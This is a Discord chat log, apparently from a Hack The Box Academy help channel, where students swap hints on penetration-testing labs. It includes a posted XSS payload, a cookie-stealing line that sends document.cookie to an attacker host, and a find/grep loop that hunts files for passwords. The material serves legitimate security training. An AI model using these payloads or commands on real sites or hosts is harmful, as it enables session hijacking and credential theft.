I'm stuck on the Snort Rule Development question in the Working With IDS/IPS, I already edited the local.rules and I can detect the log4shell attack, but the answer is still Incorrect answer!.... any hint will appreciate

The question is:

There is a file named log4shell.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to log4shell exploitation attempts, where the payload is embedded within the user agent. Enter the keyword that should be specified right before the content keyword of the rule with sid 10000098 within the local.rules file so that an alert is triggered as your answer. Answer format: [keyword];

I opened the browser and I can see that there's an image.php but I didn't upload it initially. I guess I have to find a way to get rid of it, so that MSF can open a session at least

I guessing U ment 2:
[-] johanna not ok for...
[-] johanna not ok for...

but I can't find where they belong...

Maybe I'm way behind your stage but how could you find other users I only found the user admin and accessed the shared folder, and there I found Docx.zip but I can't open the file after cracking everything it gives me "Archive type not supported." can you help me?

You are signed in as that user yes?

Zip2john

And docx2john iirc

I used Zip2john, found a password

And you unzip yeah?

Could not open "Documentation.docx"

Archive type not supported.

so I'm not sure what u meant by locking 4 key

why are you unzipping the document

They use a password storage program

I unzipped but I'm not sure if there's something called docx2john, I used office2john?

Libre office

office2john is fine

That what it is

I don't have libra office on the pwnbox, i'm trying to encrypt this file but somehow I can't i, even tho have the password from "office2john" results.
I found two tools but both aren't helping me out (https://www.kali.org/tools/ccrypt/, https://github.com/nolze/msoffcrypto-tool)
└──╼ [★]$ file Documentation.docx
Documentation.docx: CDFV2 Encrypted

@fathom pendant I was able to successfully use the braa cmd to to enumerate the SNMP service on the Footprinting Lab - Hard but I don't understand what to do next with the information that I found here? the cmd I used was: braa <community string>@IP:.1.3.6.*

you're gunna have to open it

install libreoffice, transfer the file, ect

^

there is a route to decrypting it and then unpacking it to maybe retrieve text but youre out of module scope and creating 35x the necessary work

Well what information did it give you, and what ports are open that could use the info

not sure how 2 move from here...

Keypass

That's it

When you say ports, what does that format look like with the info it spat out?

Okay I'm installing liberoffice thanks

hi anyone who could help me out with this ? "Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer."

i have looked everywhere but cant find the answer help

I'm saying Nmap info

The section should tell you how to get the info

sometimes you just have to read whats presented to you.

even if its a lot of info and most of it is junk

read line by line anyways

(welcome to hacking, we read a lot of junk)

Ports: 22,110,143,993,995

You also tend to go back and forth on thibgs

OK have fun enumerating the protocols presented :) you have a username and password

It's a skill assessment I'm not just gonna spell out what to do next

https://academy.hackthebox.com/achievement/285625/147 I went from hating password attacks to kind of liking them

I am close to this Just need to complete PTH section

It's all about knowing how to use the info presented

This module is kind of irritating in the beginning but over all good

Nice

Yes, at the start i hated it lol

But it has its beauties

Definitely

My only complaints with the module is its a slog and doesnt need to be

literally just going through and better selecting the correct passwords to not waste as much student time is all thats needed to make the module significantly better

cause while in the real world long wait times are realistic and to be expected, long wait times in a learning environment doesnt help much

Yes, but its about making it realistic

Doesn't matter

Ok, i get your point xd

For that reason i hated it in the beginning, felt so wasted

One of the hallmarks of effective learning is whats called rapid feedback. Meaning the quicker you can see the results of your attempts, the faster you can adjust to it and thus the faster you learn and the more effective your practice is.

true

Sos9spspspss

OS9s0ss

Are u okay man?

<@&861185840277487616>

could be cat but still

Im doing ban speedrun

Duh

Goodluck

If you want to be blocked, just ask an admin/moderator. They will surely help you

Press shift

Then you can delete the messages faster

https://tenor.com/view/bh187-spongebob-hmm-thinking-let-me-think-gif-21499915

I'm late

https://tenor.com/view/spongebob-meme-gif-23035933

UP

You might be doing the right idea wrong execution. I haven't done this module so I couldn't tell you

Answer format: [keyword];

I tried but didn't work

it is just a placeholder

you are not required to put the verb in brackets

ls

I think htb should rework the server-side attacks skills assessment 🙄. It is just like a simple ctf which doesn't cover any vulnerability about server-side attacks.

yo idrk where else to talk but does anyone wanna take my guide on beaming?

i need new users so i can get payed by the dev

https://tenor.com/view/oh-fuck-off-fuck-logan-roy-logan-roy-gif-25157146

damn

beaming?

This really isn't the server for that, I suggest reading #welcome and #rules

damn alright

yeah like

idk

it seemed like a big hacking server

but it’s most likely different

Still not the right place

got it

I tried all situation but didn't work 😐

Because first you said beaming then you said game

So

If you wanna try your luck at not getting thwacked by a mod, go to #1024429874246590575

Sadly, thats one of the ones I need to go back and look at to figure out a smarter way of solving it. Short answer is it's just one of the field types you can have for content.

but you need to have the ; at the end

hi, what algorithem hash need here [ File Transfer ]
||+ 2 Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer.||
i do it three time times , with md5 and sha256

Thank you @pine dagger I will try harder, but can i back to you if I didn't find it? I mean PM you?

There is tool called hasher

hasher or using ps [ Get-FileHash file.txt -Algorithm md5 ]

Someone can help me? Footprinting Lab - Hard
I already login in ssh with the tom user but I don't know what to do as next step.
I know I need to login in the mysql with the password that I already found in .mysql_history but it retrieve me "permission denied". It exists another user which probably have more privilege than tom where can log in in the mysql, but I don't know how to do it because i didn't find nothing of interesting.

done thx

Is there any way to acces unlimited pwnbox in HTB free of cost?

I'm 16 I don't have enough money to purchase paid subscription

nope

not sure if i'm right but it's 5 buck

It's showing 8$ for students who have educational mail

check faq > Is there a limit on Pwnbox usage?

Yeah

2 hr

Get unlimited Pwnbox access by either subscribing for any plan or "buying any amount of cubes" in Academy's

Okay

Aside from giving you the answer, I'm not sure how I could help very much... however, what you can look at is this: http://manual-snort-org.s3-website-us-east-1.amazonaws.com/node32.html#SECTION00451000000000000000
Specifically you want to look at 3.5.1.3 where it shows the possible keywords.

I understand this is not a good place to ask but I don’t know where to ask but I have 2 files with word list in them. So each file has a lot of random words. I would like to combine the two word list together. So word list one will get every word in list two behind it. But I need to limit the letters to 15. So I would like to kick out any combination of words that is longer than 15. Can anyone give me any times of what program could do this

Hashcat will not do it crunch will not do it

Well you can combine them like this;
cat file1.txt file2.txt > combined.txt

hint try logging in to myql with the cred that you already have

add I would add a sort -u |sed 's/.\{15\}/&/g'

Hi everyone, i'm currently in the skill assessment of file upload module. I found the upload directory by exploiting a xxe vulnerability. Now my problem is that when i want to access to my files in this directory (even by uploading a photo without payload) i can't, error 404. Can someone help me pls ?

read #welcome and #rules after that use /verify at #bot-commands if you are on HTB and that will give you access to more channels for your specific question in the future

The only cred that I have is the the retrieved from .mysql_history which doesn't work, and the id_rsa

*spoilers

also yep try with the cred you have

Ok, thx

My problem is I need to limit the length

https://tenor.com/view/fuck-off-gif-25155655

sort -u |sed 's/.\{15\}/&/g'

@teal hull you probably need this 🙂

Have you been able to solve this?

Brò wtf

I love that your profile says ‘old enough to be on discord’ 😂

I don’t know what this means thanks for your comment tho

Do u have a document I can read you can pull up read quick

mmm for?

To explain what that means

sed the most confusing linux command of them all 😄

try with: https://explainshell.com/ otherwise google

I'm fuckin dumb 💀

Chatgpt might be the easiest to explain it

It’s always fun to make fun of someone trying to learn. I bet you feel super powerful

Congrats on that tho

well, that was a good advice

DuxSec didn't mean to make fun of you, otherwise if you feel like you can read the man page or the entire sed and awk manual (as I did once)

@teal hull he was right https://chat.openai.com/share/73d184a7-6d44-4543-ad51-1f3a0d0cc5f4

I honestly think it is good to explain the command.

?

think about how to find out where the files are saved and how they are named.

Academy limit is actually once per day

This just puts the content of the a file into another file. I need to add the word of file two behind the word in file one

Just ask in #1024429874246590575

Inside Attacking Common Applications -> IIS Tilde Enumeration, I am having issues reproducing the actual tilde enumeration given in the example, by bruteforcing each character (using the script I wrote on the screenshot). However, that produces no results at all. Each requests leads to a 404.

Keep in mind that I was able to do it using the IIS-ShortName-Scanner tool, and completed the section, but I'm wondering what's the correct way of enumerating it manually.

For anyone who has done AD Enumeration & Attacks - Skills Assessment Part I, how did you get the full ip and domain name of MS01?

nslookup

@acoustic owl may I DM ?

sure

Skills Assessment - Using Web Proxies

Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

i don't know how to fuzz the last charecter

any help plz

You can't access the upload folder directly. You need to use another page which gives you indirect access.

Ah yes ty

Are you sure ?🤔

Well... its how I did it.

There's a particular page that uses a certain filetype that you can upload.

Wait, I may have misread my notes

Oh, its in a subdir, but the uploaded file gets some info appended to it.

Ahah okay that is what i understood ty 😂👍🏻

Need to read my own notes more carefully 😄

<@&861185840277487616>

someone interested in a learning buddy beginner level?

Did someone solve this? Problem typing "@"...

If someone wanna PM about Footprinting medium, thats completly ok:) Issue is syntax related

Can't find a way to type "@", dont' have access to the clipboard :/

Derp, it's possible to login from Remmina with Administrator account...

Slow-mode set in modules to 0 seconds.

Hi everyone, is anyone able to give a little help on race conditions in whitebox attacks?

Any job in UK for cybersecurity fresh graduated 2:1 grades

I’m mate

This isn't the channel for that read #welcome

Hi guys, I'm stuck with "Password Attacks Lab - Medium" I got ssh access as jason then went through all the methods for hunting more credintials for dennis or whatever but can't find any. any hint pls?

Sql

I'm not sure :(((((
for l in $(echo ".sql .db .db .db"); do echo -e "\nDB File extension: $l"; files=$(find / -name "*$l" 2>/dev/null | grep -v "doc|lib|headers|share|man"); for file in $files; do echo -e "\nLines containing 'password' in $file:"; grep "password" "$file"; done; done
I tired this to find any creds there also

mysql -u '' -h ''

ERROR 2003 (HY000): Can't connect to MySQL server on '10.129.x.x:3306'
I'm not sure what does jump host means

Connect to it using jason

yes I did using jason but it's not going through

Mysql is running locally

Not externally

The docs that give you j* cred tell you so

oh okay I'm in the mysql now digging

my focus is below zero

If you have low focus: take a break

it's 1:49am I wanna finish this question and sleep :DDDD thanks for you quick responses btw ^_^

Sleep now: finish question after sleep

seems like you might have bad username or authentication information

I feel, I'm almost done on dennis ssh now, will get this ssh key and crack it

its DOMAIN/User

not DCHOST.DOMAIN/User

oh ok

also Im not sure you can pass the hash in that format. I think you need to specify an option and add the hash there

Indeed

I dont use wmiexec often, look at its help information for specifics

thx 🙂

remember to write a note about it so you dont forget for next time

I found it thanks for your help, I can sleep/celebrate peacefully ^__^

Hoping to get a nudge on this ^^

hey everyone, if anyone has completed the “chase” machine under “Intro to Blue Team” what is the password when opening the compressed file? thank you.

This isn't the place that sounds like one of the tracks on the main site. I would recommend reading #welcome so you have access to #boxes

@fathom pendant thank you

Hi

guys i am new here

how do i find a fqdn other than by ping and nslookup?

ive been trying to find it by dns, netbios, everything, even ping but nothing seems to be fingerprinting it

Other dns queries can return that I believe

like what

There's at least one way discussed in footprinting/dns

damn that is far into my mind

alright ill try to go over it

Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

Morning all, here we are again, completely stuck and frustrated! This time I am on the Session Hijacking section of the CROSS-SITE SCRIPTING (XSS) module on the pen tester path. I am trying to get the flag but no matter what I do, the php listener is refusing to grab the flag. I am inserting the suggested payload into the profile picture url but I get nothing back! I have rebooted the pwn box and the target! I have followed the content on HTB and I have followed a couple of walkthroughs but nothing seems to work, I am a good 4 hours in now! Any help would be greatly appreciated. Thanks

hello i am working on File upload, client validation section. in the exercise HTB provides us with a web page to upload a profile pic, the exercise asks us to intercept the POST request which uploads the pic. i start up burp and click on open browser , which opens chrome. i click on Intercept in burp, but burp is not intercepting the POST command, its able to intercept only the very first GET command.

try to get this in burp, but not able to

Already frustrated in the morning? That is not good

What exactly have you tried so far? Are you sure you are attacking the right field?
What does your code look like?

As I understand it, Chrome is not configured to send its requests to the proxy.

Been at it days! I spend a couple of hours before work. Yes, I am attacking the user profile field as it says n the content, I am using the code it says in the content, and the code it says in other guides I have followed. I have tried everything in the content. <script src=http://10.10.14.46:3333/script.js></script> is the payload I am using. I have tried a netcat listener and a php listener.

that payload is url encoded after pasting it in here

10.10.14.46 is your IP or the IP from the module/other guides?

that is my IP

Your netcat listener or webserver is running on Port 3333?

correct

it is actually, i was working with chrome till yesterday( i used the open browser option in burp). it was working fine. even the upload exploitation exercise is not working for me.

listener on 3333

you have made me think about something now, why does the content not make a clear distinction between these two??

I am now very confused! re the listener and the webserver

Why?

well, the content does not make it clear

i follow it exactly and it does not work

so I am confused

Because the parameters in the Lab are different from the example shown

take this for example, new Image().src='http://OUR_IP/index.php?c='+document.cookie
no mention of a port number

yet the listener is listening on 3333

If you run your web server on port 80, you don't have to specify a port either

so the listener and the webserver are both on port 80

You can run only one service per port. Either web server or NC listener

exactly

so how is this going to work?

i need a webserver to serve up the script

and i need a listener to catch the script execution

But I don't understand why you want to run a netcat listener.
Yes, to see if a connection is established at all. But you can also see that with the web server

so the webserver shows the exection of the script

Depends on your script.

clearly something has led me to beleive both a webserver and a listener need to be running

I find some of this content so confusing

im ok with challenging but I do not like unclear instructions

It is important that you understand what exactly works when

or ambigious instructions i should say

not helpful at all

ok will go back and try with a web server on port 80 and forget the listener

thank you

Im trying to understand, spent hours, not just skimming it

whats obvious to one is not always obvious to another

Have you done the Web Requests module?
https://academy.hackthebox.com/module/details/35

I have yes

like i say, i just find the content very ambigious

i totally get the concepts of what is going on

the fine detail is tripping me up on the labs

I never had these issues with try hack me

maybe I look at heading back over there

TryHackMe takes you by the hand and shows you every single step.
The Academy continues. It explains the details and then lets you try it yourself.

For this reason, I often recommend learning the basics first with THM. Then deepen the knowledge with the Academy and learn new things.

There are three stages in learning

At the first level you are shown everything step by step. One demonstrates it, you do it after. There are no interfering factors.
Example: riding a bike
Your bike has training wheels, mom/dad is standing right next to you, you are on a well-lit path, no traffic.

In the second stage, you are shown more things. But basically you do everything yourself.
Example riding a bike
Light may be diffuse, there are pedestrians, mom/dad is no longer standing next to you.

Third stage
You have a learning environment, but you train on your own. You are now deepening your knowledge.

Example riding a bike
The training wheels are gone, it is night, there is traffic.
The environment is still safe, but there are many disruptive factors.

Do I just have to wait for this to finish? (Attacking DNS)

What do you want to do?

Waiting until a tool has done its job is basically never wrong

But it takes so long lol

Duration depends on your list

You can already continue working with the found subdomains

They have nothing

Or I am doing something wrong

The A record points to nothing, same with the AAAA record, then I tried CNAME and TXT but got nothing

Is hr.inlanefreight.htb a zone? Or a host?

BRUh

Its a zone

How will i know if its a zone or host? If the axfr zone transfer wouldnt have worked?

https://www.cloudflare.com/learning/dns/glossary/dns-zone/

Yes I know what the difference is, but I dont know how to differenciate between them in a scan, lets say I scan and find helpdesk.inlanefreight.htb and ns.inlanefreight.htb. Lets say helpdesk is a host and ns is a zone, how would i know that?

A zone contains further entries.
At least one SOA and one name server.

The subdomain itself does not tell you if it is a zone or a host.

Ah, oke

Thanks

I wrote a python script that just recursively axfrs

In NMAP Modules, how do I know which port I can select as source port for a filtered port ?

How can i get a source port from the DNS I mean, when I have a filtered port.

Link?

Hi guys, I'm struggling in the
"Password Attacks Lab - Hard"
after getting J*** password, Do I need 2 transfer the L**.k** file, because I can't make it work...

its literally 20 lines of code thats not even a gist 😄

probably but there are many ways to transfer files

I'm not programmer so it would Still be a big help for me please

I don't know what 2 do, tried ftp (didn't work), tried nc (didn't work), in smb (don't have permission) also ssh didn't work

I DMed you but you will have to figure it out on your own

try a webserver or if the file is small (which it is) you can simply base64 it and copy paste it or you could alternatively look at the file transfer module (again)

I am unable to access web server in "module:- 77 section:- 728" the web enumeration part
is that an issue or i am missing something? ( i am able to access it from pwnbox but not from my kali )

Check your VPN Connection

Hi guys, need some help with Footprinting-IPMI task 2. I run hashcat with footprinting and rockyou wordlists, but it gives wrong passwords like 'anna' and "oooooo"

Hey guys, I’m stuck on the firewal and ids/ips evasion medium lab. I’ve tried everything I can think of under the sun, and commands other people suggested aswell. My current command is:
Nmap -sSUV -S (ip) —Source-port —packet-trace

I’ve tried changing the max time out and the aggression level with -T. I got 2 HTB flags but neither worked, maybe they aren’t in the right format? Any help would be amazing! Dms welcome!

guys i have this machine (https://app.hackthebox.com/machines/Timelapse) , not able to do anything with it !! , connected to the vpn but idk why can't i even scan it !!!!

if any help plz dm me cuz a lot of msgs here so i will be lost to find the reply

So I did "impacket-smbserver...." but when I'm trying 2 cp the L**.k** it say I don't have permission
what am I missing ?

sry guys i new to htb , i don't usually use it !! , so once i tried to restart the machine it says (machine isn't active this week) , how would i know when it's actived again !???

just keep it simple there are so many ways and I already proposed 2 you didnt try

I guess there R 2 many
so far none are working
thanx anyway